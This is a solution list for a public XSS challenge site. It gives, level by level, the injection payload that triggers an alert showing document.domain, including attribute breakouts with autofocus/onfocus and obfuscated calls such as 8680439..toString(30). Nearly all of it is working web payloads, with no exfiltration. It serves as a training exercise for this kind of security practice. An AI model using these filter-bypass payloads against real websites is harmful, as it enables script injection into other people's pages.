Solutions of XSS Challenges of http://sudo.co.il/xss/

---

---

**Our mission is to popup window with document.domain (sudo.co.il) without any kind of user interaction **

• Level 0

<script>alert(document.domain)</script>

• Level 1

"><script>alert(document.domain)</script>

• Level 2

" autofocus onfocus="alert(document.domain)

• Level 3

"autofocus/onfocus="alert(document.domain)

• Level 4

"autofocus/onfocus="confirm(document.domain)

• Level 5.1

'-alert(document.domain)-'

• Level 5.2

\'-alert(document.domain);<!--

• Level 6

\'-alert(document.domain);//

• Level 7

" autofocus="" onfocus="alert(document.domain)

• Level 8

"};this[8680439..toString(30)](document.domain);//

• Level 8.1

"};this[8680439..toString(30)](document.domain);{"

• Level 9

'};this[8680439..toString(30)](document.domain);{'

• Level 10

';this[8680439..toString(30)](document.domain);//'

or,

x';x=top["al"%2B"ert"](document.domain);//

or,

x';x=this["al"%2B"ert"](document.domain);//

• Level 11

#<script>alert(document.domain)</script>